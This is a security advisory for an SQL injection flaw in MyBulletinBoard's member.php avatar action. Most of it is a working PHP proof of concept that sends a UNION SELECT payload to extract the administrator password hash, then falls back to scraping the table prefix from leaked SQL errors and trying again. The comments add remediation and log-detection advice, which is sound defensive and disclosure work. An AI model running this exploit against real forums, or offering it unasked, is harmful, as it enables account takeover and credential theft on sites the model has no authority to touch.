MyBulletinBoard MEMBER.PHP SQL Injection Vulnerability
An exploit is not required. The following proof of concept is reported to disclose the administrator password hash to a remote attacker: <?php
// Proof-of-concept as published in the advisory, reformatted and annotated for
// review. The notes describe the weakness the probe relies on so the affected
// code path can be fixed and the request recognised in server logs.
//
// Weakness demonstrated: the PoC indicates that member.php (action=avatar)
// interpolates the POSTed `uid` value into a SQL statement without integer
// coercion or escaping. Remediation is to treat uid strictly as an integer
// ((int) cast / intval, or a bound parameter) before it reaches the query;
// a typed parameter removes the whole class of string-terminated injection.
//
// Secondary weakness: the fallback branch below assumes the server renders
// the failing SQL text, table prefix included, in its HTTP response. Database
// errors should be logged server-side and never echoed to the requester.
//
// Detection: a POST to member.php?action=avatar whose uid parameter carries
// `UNION SELECT`, `ORDER BY`, or a trailing `/*` is not legitimate traffic and
// is a useful signature for request logging or a WAF rule.

// the example below will attack http://www.example.com/mybb/
echo 'Pass:' . get_pass('www.example.com', '/mybb', '');

// Sends a single crafted POST to $host$path/member.php and returns either the
// captured hash (a 32-character hex token matched in the response, presumably
// an MD5 digest; the advisory does not state the algorithm) or the string
// 'Unable to obtain password'. When called with an empty $dbprefix and no hash
// is found, it scrapes the table prefix from the response and calls itself once
// more with that prefix.
function get_pass($host, $path, $dbprefix)
{
    // The injected uid value; this is the string a log search or WAF rule should key on.
    $query[] = 'uid=' . urlencode("1' UNION SELECT 10000, 200, password AS type FROM {$dbprefix}users WHERE uid=1 ORDER BY uid DESC/*");
    $query = implode('&', $query);

    // Hand-built HTTP/1.1 POST; the vulnerable parameter travels in the form body.
    $header = "POST $path/member.php?action=avatar HTTP/1.1\r\n";
    $header .= "Host: $host\r\n";
    $header .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $header .= "Content-Length: " . strlen($query) . "\r\n\r\n";

    $fp = fsockopen($host, 80, $errno, $errstr, 30);
    fwrite($fp, $header . $query);

    // Read the whole response (headers and body) into one string.
    $allah = '';
    while (!feof($fp)) {
        $tmp = fgets($fp, 1024);
        $allah .= $tmp;
    }
    fclose($fp);

    // A 32-character hex token following a colon is taken to be the leaked hash.
    preg_match('/\: ([a-z0-9]{32})/i', $allah, $matches);

    if (empty($matches[1]) && empty($dbprefix)) {
        // No hash yet: recover the table prefix from the SQL error text the
        // server echoed back (the information leak noted above), then retry.
        preg_match('#FROM (\w+)avatars WHERE#i', $allah, $matches);
        $dbprefix = $matches[1];
        if (empty($dbprefix)) {
            return 'Unable to obtain password';
        }
        $password = get_pass($host, $path, $dbprefix);
    } else {
        $password = $matches[1];
    }

    return $password;
}
?> |